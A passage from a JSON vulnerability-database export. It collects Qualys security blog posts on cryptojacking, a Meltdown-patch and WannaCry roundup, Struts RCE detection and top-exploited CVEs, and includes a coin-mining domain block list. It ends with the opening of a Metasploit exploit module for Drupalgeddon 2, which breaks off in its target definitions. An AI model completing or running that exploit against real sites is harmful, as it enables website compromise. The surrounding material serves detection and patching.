mainstream recently because it is safer for cyber criminals and webmasters than ransomware, which requires interaction with the victim to collect payment. And because cryptojacking is browser based, it is easier to infect victims than hacking into servers. As cryptomining becomes more resource-intensive over time in terms of compute power and electricity consumption required, stealing those resources is becoming more enticing to attackers.\n\n### Cryptojacking and Monero\n\n[Monero (XMR)](<https://en.wikipedia.org/wiki/Monero_\\(cryptocurrency\\)>), a relatively new cryptocurrency, is becoming a more common target of cryptojacking attackers because its mining algorithm ([CryptoNight](<https://en.wikipedia.org/wiki/CryptoNote#Egalitarian_proof_of_work>)) is designed for easy integration and because its privacy and anonymity features also benefit hackers. Monero\u2019s proof-of-work mining algorithm can be used with desktop- or server-grade CPUs rather than custom-built specialized ASIC or GPU hardware that is required for traditional coin mining algorithms. This is an important aspect of new generation cryptocurrency, as it tries to be decentralized and avoid enabling a small set of users with access to specialized hardware from creating a mining monopoly. From an attacker\u2019s standpoint, the possibility of making sizable profits off desktop-grade CPUs with added privacy is a lucrative option.\n\nA popular technology used in most browser based cryptocurrency mining algorithms is WASM, short for WebAssembly. It is a binary executable format for the web that makes JavaScript execution within the browser quite efficient.\n\n\n\n_Fig. 1 CryptoNight based cryptocurrencies market capitalization, June 2018. Source: <https://coinmarketcap.com>_\n\n \n\n### Infections\n\nThe security research blog [Bad Packet Reports](<https://badpackets.net/>) recently published an [article](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) that stated the presence of more than 100,000 sites that are currently infected with cryptojacking malware. Most of these sites seem to be compromised using an exploit for the [Drupalgeddon 2](<https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql>). The attack exploits the vulnerability [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>), even after the [patch](<https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch>) has been available for several months already. [Side note: Always patch regularly!] There are reports of malware campaigns leveraging a recently released exploit for this vulnerability to compromise victims and inject coin mining scripts. Once a user visits these compromised sites, their system unwittingly contributes towards solving a crypto puzzle that benefits attackers.\n\nTo protect users from their computing resources being drained via unauthorized coin mining scripts running on your machine, one needs to block access to the following popular coin mining services:\n\n * coinhive[.]com\n * load[.]jsecoin[.]com\n * crypto-loot[.]com\n * coin-have[.]com\n * ppoi[.]org\n * cryptoloot[.]pro\n * papoto[.]com\n * coinlab[.]biz\n\n### Qualys BrowserCheck CoinBlocker Extension for Google Chrome\n\nBased on extensive research from Qualys Malware Research Labs, we are announcing [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>), a new Google Chrome browser extension to protect users from browser-based coin mining attacks.\n\nHere are a few screenshots of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) in action:\n\n \n\n\n\n_Fig. 2 Qualys BrowserCheck CoinBlocker_\n\n \n\n\n\n_Fig. 3 Qualys BrowserCheck CoinBlocker Detection Logs_\n\n \n\nQualys BrowserCheck CoinBlocker Extension relies not only on the domain blacklist but also uses heuristics to identify underlying cryptomining algorithms like CryptoNight (used for mining Monero) and its various artifacts.\n\n### Detecting Traditional Cryptomining Threats\n\nAdditionally, cryptomining is not just limited to browser-based scripts as we have seen certain attackers infect systems with a persistent malware that runs outside of a browser to perform cryptomining. To help detect such malware, security professionals can use [Qualys Indication of Compromise](<https://www.qualys.com/apps/indication-of-compromise/>) (IOC) solution to gain 2-second visibility into coin mining and other malware across their entire organization. Qualys IOC includes behaviour-based malware family detection for the following coin mining threats:\n\n * CryptoMinerA\n * CryptoMinerB\n * CryptoMinerC\n * CryptoMinerD\n * CryptoMinerE\n * Neksminer\n\nCryptomining is a rising online threat that is expected to grow as digital currencies and blockchain technologies are getting wider acceptance. Attacker are employing various techniques to use unsuspecting users' systems for malicious purposes. We advise our users to regularly scan systems for vulnerabilities using tools like [Qualys BrowserCheck](<https://browsercheck.qualys.com/>). Stay protected online from crypto-mining attacks with [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension.", "modified": "2018-07-25T17:00:02", "published": "2018-07-25T17:00:02", "id": "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980", "href": "https://blog.qualys.com/technology/2018/07/25/staying-safe-in-the-era-of-browser-based-cryptocurrency-mining", "type": "qualysblog", "title": "Staying Safe in the Era of Browser-based Cryptocurrency Mining", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T20:50:12", "bulletinFamily": "blog", "description": "In our weekly roundup of InfoSec happenings, we start, as has often been the case this year, with concerning Meltdown / Spectre news -- this time involving Microsoft -- and also touch on a password hack at Under Armour, a WannaCry infection at Boeing, and a severe Drupal vulnerability.\n\n### Microsoft patches its Meltdown patch, then patches it again\n\nIn an instance of the cure possibly being worse than the disease, a Microsoft patch for Meltdown released in January created a gaping security hole in certain systems in which it was installed.\n\n\n\nIt took Microsoft two tries to fix the issue, which affects Windows 7 (x64) and Windows Server 2008 R2 (x64) systems. The company thought it had solved the vulnerability ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>)) with a scheduled patch last Tuesday, but then had to rush out an emergency fix two days later.\n\nSecurity researcher Ulf Frisk, who discovered the vulnerability, [called it](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>) \u201cway worse\u201d than Meltdown because it \u201callowed any process to read the complete memory contents at gigabytes per second\u201d and made it possible to write to arbitrary memory as well.\n\n\u201cNo fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process,\u201d Frisk wrote. \u201cExploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required -- just standard read and write.\u201d\n\nAs Qualys\u2019 Director of Product Management for Patch Management Gill Langston [wrote](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night>) in this blog, there are no current active attacks against this vulnerability but there is proof-of-concept code. \u201cOpportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset,\u201d he warned.\n\nLangston recommends that organizations install Thursday\u2019s out-of-band patch if they installed any of the security updates in January of this year or later. \u201cAlso ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile,\u201d he wrote.\n\nQualys created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). Detection requires authenticated scanning or a[ Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset.\n\n### Under Armour\u2019s MyFitnessPal app passwords swiped\n\nCyber thieves stole usernames, email addresses, and hashed passwords from 150 million accounts of Under Armour\u2019s MyFitnessPal app at some point during February. Those affected must change their MyFitnessPal app passwords immediately, and should do the same on any other online account in which they\u2019ve used that same password.\n\nThey also should be vigilant about suspicious activity on all their other online accounts, and about unsolicited requests to provide personal information, visit webpages, click on email links or download attachments.\n\n\n\nUnder Armour, a sports apparel maker, made no mention in its [breach notice](<https://content.myfitnesspal.com/security-information/notice.html>) of how the hackers were able to access the data. The company discovered the hack last week.\n\nOver at Sophos\u2019[ Naked Security blog](<https://nakedsecurity.sophos.com/2018/03/30/150-million-myfitnesspal-accounts-compromised-heres-what-to-do/>), Mark Stockley points out that the hackers had at least a month \u201cto send targeted MyFitnessPal phishing emails, to crack the stolen password hashes, and to try any cracked passwords on other services (such as social media accounts).\u201d\n\n\u201cSince the information at risk can be used to log in to your MyFitnessPal account, all the data you see when you log in to your account is also at risk,\u201d he added.\n\n[Writing in Wired](<https://www.wired.com/story/under-armour-myfitnesspal-hack-password-hashing/>), Lily Hay Newman makes a thorough analysis of the hack, and of what Under Armour did well (quick disclosure, system segmentation, use of \u201cbcrypt\u201d hashing function) and not so well (use of SHA-1 hashing function).\n\n### WannaCry infects Boeing systems\n\nIf you thought WannaCry was oh so 2017, think again. The notorious ransomware grabbed headlines again last week when [news broke](<https://www.seattletimes.com/business/boeing-aerospace/boeing-hit-by-wannacry-virus-fears-it-could-cripple-some-jet-production/>) that it had cropped up at giant airplane manufacturer Boeing.\n\nWhen it was first detected, Boeing leaders feared the worst, including manufacturing process disruptions, but when the dust cleared it seems the damage was[ quickly contained and pretty limited](<https://twitter.com/BoeingAirplanes/status/979134166959783937>).\n\n\u201cWe\u2019ve done a final assessment,\u201d Linda Mills, the head of communications for Boeing Commercial Airplanes, told The Seattle Times. \u201cThe vulnerability was limited to a few machines. We deployed software patches. There was no interruption to the 777 jet program or any of our programs.\u201d\n\nStill, the incident serves as a good reminder that WannaCry -- formal name WanaCrypt0r 2.0 -- spreads using an exploit called EternalBlue for Windows OS vulnerabilities that Microsoft patched in March 2017, so more than a year ago now.\n\nThe vulnerabilities, in Windows\u2019 SMB (Server Message Block) protocol and described in [security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>), were rated \u201cCritical\u201d at the time by Microsoft due to the potential for attackers to execute remote code in affected systems.\n\nWriting in Sophos\u2019 Naked Security blog, John E. Dunn suggests that systems remain unpatched for WannaCry because remediating these vulnerabilities isn\u2019t always straightforward.\n\n\u201cOne reason for this persistence is that WannaCry doesn\u2019t just affect regular desktops, laptops and servers, but also spreads to and from unpatched Windows 7 systems of the sort widely used in manufacturing as Windows Embedded,\u201d Dunn [wrote](<https://nakedsecurity.sophos.com/2018/03/29/boeing-hit-by-wannacry-reminding-everyone-the-threat-is-still-there/>).\n\nHere\u2019s [more information](<https://community.qualys.com/docs/DOC-6110?_ga=2.192879138.925004837.1522623823-480546418.1484260199>) on how to detect and address the MS17-010 vulnerabilities with Qualys products.\n\nOther WannaCry resources from Qualys include:\n\n * Detailed walkthrough of [how to report on it](<https://community.qualys.com/docs/DOC-6111?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) for those new to Qualys.\n * Detailed walkthrough of [how to build WannaCry dashboards](<https://community.qualys.com/docs/DOC-6122-how-to-create-assetview-widgets-to-report-on-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) in AssetView. Also available as a [webcast](<https://lps.qualys.com/visualize-your-threat-exposure-to-wannacry-and-shadow-brokers-with-dashboards.html?_ga=2.197079204.925004837.1522623823-480546418.1484260199>).\n * [De-duping WannaCry detections](<https://community.qualys.com/thread/17321-de-duping-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>)\n * [On-demand WannaCry webcast](<https://lps.qualys.com/rapidly-identify-assets-risk-wannacry-ransomware.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=wannacry-q2-2017&utm_content=webcast&leadsource=344554153&_ga=2.197079204.925004837.1522623823-480546418.1484260199>), [summary](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) and [transcript of participant Q&A](<https://blog.qualys.com/technology/2017/05/23/digging-into-wannacry-details-answers-to-your-burning-questions>) showing how to identify at-risk assets and institute threat-prioritized remediation processes for current and future risks.\n * [First-hand perspective](<http://www.techrepublic.com/article/patching-wannacrypt-dispatches-from-the-frontline/>) of how one company kept the threat under control (via TechRepublic)\n * Technical Resources and Detection Methods for WannaCry related QIDs are found in the WannaCry Support Article: [Qualys response for Global Ransomware Attack (WannaCry)](<https://qualys.secure.force.com/articles/How_To/000001942>)\n\n### \n\n \n\n\n\n### Drupal: Highly critical vulnerability affects 1M+ websites\n\nAs it had recently [promised](<https://www.drupal.org/psa-2018-001>), Drupal last week released a patch for a remote code execution vulnerability it rated as \u201chighly critical\u201d that affects multiple subsystems of Drupal 7.x and 8.x.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d Drupal [warned](<https://www.drupal.org/sa-core-2018-002>) in its advisory.\n\n\n\nIn a companion [FAQ](<https://groups.drupal.org/security/faq-2018-002>), the Drupal security team pegged the scope of affected systems at 9% of sites using its CMS (content management system) platform, or more than 1 million sites. \n\nWhile Drupal has no knowledge of successful exploits of this vulnerability, it nonetheless recommends immediate remediation because \u201csite owners should anticipate that exploits may be developed and should therefore update their sites immediately.\u201d\n\nThe solution: Upgrade to the most recent version of Drupal 7 or 8 core.\n\nSpecifically, those running 7.x should upgrade to [Drupal 7.58](<https://www.drupal.org/project/drupal/releases/7.58>), or alternatively apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5>) on systems that can\u2019t be immediately upgraded. Meanwhile, those running 8.5.x should upgrade to [Drupal 8.5.1](<https://www.drupal.org/project/drupal/releases/8.5.1>), or apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f>) on systems that can\u2019t be immediately upgraded. The FAQ states that Drupal 6 is also affected and points users of that version to its [long term support page](<https://www.drupal.org/project/d6lts>).\n\nWriting in the Qualys Community site, Dave Ferguson, Director of Product Management for Web Application Scanning at Qualys, [called](<https://community.qualys.com/docs/DOC-6373-was-and-newly-discovered-drupal-vulnerabilities>) the vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) \u201cvery dangerous.\u201d \n\nAccording to Ferguson, customers using Qualys Web Application Scanning (WAS) to scan all their websites on a regular basis can quickly find out if they\u2019re running a vulnerable Drupal version without having to run additional scans. \n\n\u201cSimply open WAS and go to Detections. In the search field, enter \"150183\" (this is the WAS QID reported when Drupal CMS is detected). If WAS has identified any web apps running Drupal, you will see QID 150183 listed in the detections. Open each detection and look at the Results section to see the version of Drupal running on that site. If necessary, start the patching process,\u201d Ferguson wrote.\n\n### In other infosec news \u2026\n\n * The city government of Atlanta, which recently suffered a serious[ ransomware attack](<https://www.csoonline.com/article/3264654/security/atlanta-officials-still-working-around-the-clock-to-resolve-ransomware-attack.html>) that disrupted operations, was warned months ago that its IT systems were riddled with \u201csevere and critical vulnerabilities\u201d that put them in serious danger of cyber attacks, [according to CBS46](<http://www.cbs46.com/story/37821878/internal-audit-shows-city-knew-of-it-vulnerabilities>), the local CBS affiliate. \n * Hackers breached a Baltimore city government server, impacting the city\u2019s 911 system, as [reported](<http://www.baltimoresun.com/news/maryland/crime/bs-md-ci-911-hacked-20180327-story.html>) by The Baltimore Sun.\n * Cryptocurrency Monero may not be as private as previously thought, according to a [research report](<https://arxiv.org/pdf/1704.04299.pdf>) published last week. Sophos\u2019 Naked Security blog has a [take](<https://nakedsecurity.sophos.com/2018/03/28/unmasking-monero-stripping-the-currencys-privacy-protection/>) on the research, as does [Wired](<https://www.wired.com/story/monero-privacy/>), while Coindesk [dismisses](<https://www.coindesk.com/broken-privacy-the-allegations-against-monero-are-old-news/>) the findings as \u201cold news.\u201d", "modified": "2018-04-02T18:02:51", "published": "2018-04-02T18:02:51", "id": "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "href": "https://blog.qualys.com/news/2018/04/02/microsoft-misfires-with-meltdown-patch-while-wannacry-pops-up-at-boeing", "type": "qualysblog", "title": "Microsoft Misfires with Meltdown Patch, while WannaCry Pops Up at Boeing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-14T20:46:20", "bulletinFamily": "blog", "description": "A new remote code execution [vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts 2, CVE-2018-11776, was [disclosed](<https://semmle.com/news/apache-struts-CVE-2018-11776>) yesterday. While this vulnerability does not exist with a default configuration of Struts, it does exist in commonly seen configurations for some Struts plugins.\n\n**Update August 24, 2018**: A [dashboard for this vulnerability](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776>) is now available to download.\n\n### The Vulnerability\n\nStruts improperly validates namespaces, allowing for [OGNL](<https://en.wikipedia.org/wiki/OGNL>) injection, and can lead to full remote code execution on the target system. For a more detailed technical look at the vulnerability, please see our [Threat Protection blog](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/>) on this topic. Struts versions 2.3.34 and 2.5.16 and before are impacted.\n\n### Recommended Response\n\nDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2. Patched versions are Struts [2.3.35](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.35>) and [2.5.17](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.17>). A publicly available [PoC](<https://github.com/jas502n/St2-057/blob/master/README.md>) has already been published, and active attacks against this vulnerability are most likely imminent.\n\n### Detections\n\nVulnerabilities in application frameworks are challenging to programmatically detect with traditional VM scanning, and multiple methods of detection are needed to ensure that Struts is found.\n\nBecause of this, Qualys has implemented two QIDs for detecting CVE-2018-11776 in [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>):\n\n * **QID 13251** - This detection includes both remote and authenticated checks: \n * **Remote** - This detection sends a specifically crafted payload in the request to check for command execution in .action, .go, .do, .jsp and .xhtml files under common web directories.\n * **Authenticated (Linux/Unix)** - This executes ps -ef command, looks for the presence of the Tomcat process and finds the location of struts2-core-x.jar file. We are investigating using this method on other middleware technologies.\n * **QID 371151** - This authenticated scan detection uses our Tomcat auth to specify the location of the Tomcat configuration file. Once a Tomcat auth record is added, this detection reads the Tomcat location from the config and searches for struts-core.x.jar file under sub directories. It extracts the version from .jar file and compares with vulnerable Struts versions.\n * Both QIDs are included in Vulnerability Signatures version **VULNSIGS-2.4.403-3** or later\n\nQualys has also implemented a QID for detecting CVE-2018-11776 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-application-scanning/>):\n\n * **QID 150250** - This is an active detection within WAS that sends a specially-crafted payload to the scanned web application. A vulnerable application will show evidence of a command executing on the server and QID 150250 will be reported.\n\nIn addition to scanning, Qualys recommends that application frameworks such as Struts be documented in an Application Portfolio or CMDB to ensure all components of an application are recorded and can be audited for these kinds of vulnerabilities.\n\n### Protection\n\nEven prior to the disclosure of this RCE vulnerability, [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) users were already protected from exploits by every possible out-of-the-box template and generic policy. These templates, developed by security experts for Qualys WAF programmable inspection engine, are constantly tested against latests threats for the best detection rate and least false-positives.\n\n\n\nCustomers using manual policies instead of templates were potentially not protected though, depending on ELI (Expression Language Injection), CI (Code Injection) and RCE (Remote Command Execution) sliders settings, along with the blocking threshold.\n\n\n\n\n\nMitigating CVE-2018-11776 is possible by using the following methods:\n\n * native protection using a **generic policy** (QID-226017: Expression Language Injection and QID-226008: Remote Command Execution)\n * for those using a manual policy instead of an out-of-the-box template, you can alternatively create a **custom rule** with the following condition: _request.path DETECT \"qid/150178\"_\n * or of course, by applying a **virtual patch** to QID-150250 from within the WAS module ; which is equivalent to creating the rule manually, but quicker.\n\nToday\u2019s example - like \"drupalgeddon2\" a few months ago (CVE-2018-7600) - demonstrates how blocking zero-days is possible with Qualys WAF, without needing to define manual rules, giving CISO and IT Security organizations time for implementing sustainable fixes, while providing them with a tool to monitor and report any attempt to exploit the vulnerability.", "modified": "2018-08-23T20:27:19", "published": "2018-08-23T20:27:19", "id": "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "href": "https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776", "type": "qualysblog", "title": "Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-27T19:32:53", "bulletinFamily": "blog", "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "modified": "2019-12-27T18:01:22", "published": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-01-20T19:38:45", "bulletinFamily": "exploit", "description": "This module exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n", "modified": "2019-03-06T00:58:11", "published": "2018-04-13T23:15:28", "id": "MSF:EXPLOIT/UNIX/WEBAPP/DRUPAL_DRUPALGEDDON2", "href": "", "type": "metasploit", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Drupal\n # XXX: CmdStager can't handle badchars\n include Msf::Exploit::PhpEXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\n 'Description' => %q{\n This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n },\n 'Author' => [\n 'Jasper Mattsson', # Vulnerability discovery\n 'a2u', # Proof of concept (Drupal 8.x)\n 'Nixawk', # Proof of concept (Drupal 8.x)\n 'FireFart', # Proof of concept (Drupal 7.x)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-7600'],\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\n ['URL', 'https://github.com/FireFart/CVE-2018-7600']\n ],\n 'DisclosureDate' => '2018-03-28',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'linux'],\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Payload' => {'BadChars' => '&>\\''},\n 'Targets' => [\n #\n # Automatic targets (PHP, cmd/unix, native)\n #\n ['Automatic (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_memory\n ],\n ['Automatic (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_dropper\n ],\n ['Automatic (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Automatic (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 7.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 7.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Gem::Version.new('7'),\n 'Type' => :php_memory\n ],\n ['Drupal 7.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Gem::Version.new('7'),\n 'Type' => :php_dropper\n ],\n ['Drupal 7.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Gem::Version.new('7'),\n 'Type' => :unix_memory\n ],\n ['Drupal 7.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Gem::Version.new('7'),\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 8.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 8.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Gem::Version.new('8'),\n 'Type' => :php_memory\n ],\n ['Drupal 8.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' 